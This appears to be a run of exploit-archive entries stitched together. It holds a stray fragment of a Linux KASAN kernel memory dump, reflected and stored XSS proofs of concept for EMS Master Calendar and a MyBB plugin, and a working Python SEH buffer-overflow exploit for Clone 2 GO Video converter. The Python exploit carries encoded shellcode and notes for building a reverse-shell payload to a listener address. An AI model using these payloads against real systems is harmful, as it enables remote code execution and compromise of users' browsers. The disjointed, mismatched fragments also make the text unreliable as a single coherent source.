    [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0
    [ 3211.553207] flags: 0x17fffc000000021(locked|lru)
    [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff
    [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0
    [ 3211.553222] page dumped because: kasan: bad access detected
    [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0

    [ 3211.553229] Memory state around the buggy address:
    [ 3211.553234]  ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 3211.553238]  ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 3211.553246]                    ^
    [ 3211.553250]  ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 3211.553254]  ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 3211.553257] ==================================================================
            
# Exploit Title: EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
# Date:  2018-06-01
# Exploit Author: Chris Barretto
# Vendor Homepage: https://www.emssoftware.com/
# Software Link: https://docs.emssoftware.com/Content/V44.1_ReleaseNotes.htm
# Version: Versions prior to 8.0.0.201805210 are vulnerable
# Tested on: Master Calendar v8.0.0.127
# CVE : CVE-2018-11628

# 1. Description:
# Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters is not properly sanitized,
# allowing malicious attackers to send a crafted URL and execute code in the context of the user's browser.

# 2. Proof of concept:
# The following PoC URL is available:
https://example.com/MasterCalendar/RssFeeds.aspx?Name=abc<script>alert('XSS')</script>xyz
            
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------------------#
# Exploit Title      : Clone 2 GO Video converter 2.8.2 Unicode Buffer Overflow (Remote Code Execution)
# Exploit Author     : Gokul Babu
# Organisation       : Arridae Infosec P.V Ltd
# Vendor Homepage    : http://www.clone2go.com/products/videoconverter.php
# Vulnerable Software: http://www.clone2go.com/down/video-converter-setup.exe
# Tested on          : Windows-7 64-bit (eip-828) (other Windows versions are also vulnerable; only the EIP overwrite will change)
# Steps to reproduce : Open evil.txt and paste its contents into Options -> Set output folder -> Browse
#----------------------------------------------------------------------------------------------------------------------#

#payload generation method
#msfpayload windows/exec CMD=calc.exe R > calc.raw
#./alpha2 eax --unicode --uppercase < calc.raw

#seh-"004d00b3"
#\x73-venetian pad(other things didn't work)
#248 bytes of padding before shellcode is required which is 124 bytes in Unicode
#EAX register is used for operation

seh= "\x41\x73" + "\xb3\x4d"
operation="\x73\x53\x73\x58\x73\x05\x0b\x01\x73\x2d\x02\x01\x73\x50\x73\xc3" + "\x90"*124

shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK83YKPKPKPS0TIYUNQ8RC4TKPRP0TK0RLL4KPRLT4KRRNHLOWGPJMVNQKO01GP6LOLQQCLM2NLMPWQXOLMKQ97IRL0PR0W4K22LP4KOROLKQ8P4KOP2XU5WP2TPJKQXPPPDKPHMHTK28MPKQXSK3OLOYTKP4TKKQXVNQKONQWP6LY1XOLMKQWW08K0RUL4M3SMZXOK3MNDBUIRQH4KB8MTKQXSBFDKLLPKTK0XMLM1IC4KKTDKM1HPSY14MTNDQKQKQQ0YPZR1KOIPQHQO1J4KLRJKE6QMRJKQTMU5VYKPM0M0PPS801TKROTGKOJ57KJP7EUR1FQXW6TUGM5MKOXUOLLFSLLJSPKK9P2UM57KOWN3T2BOBJKP1CKO8UQSC1RL2CKPA")

#msfpayload windows/shell_reverse_tcp LHOST=172.20.10.3 LPORT=4444 R > reverse.raw
#./alpha2 eax --unicode --uppercase < reverse.raw 
reverse=("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")

buf="A"*828 + seh + operation + shellcode + "D"*(4164-len(operation) -len(shellcode))

f=open("evil.txt","w")
f.write(buf)
f.close()
            
# Exploit Title: MyBB Recent Threads Plugin v1.0 - Cross-Site Scripting
# Date: 6/2/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=842
# Version: 1.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11715


1. Description:
Creates a page that shows threads that the user has posted in when they have unread replies.

 

2. Proof of Concept:

- Create or reply to a thread with the following subject  <script>alert('XSS')</script> 
- When someone replies to the thread you will see the alert here /misc.php?action=myrecentthreads



3. Solution:
Update to 1.1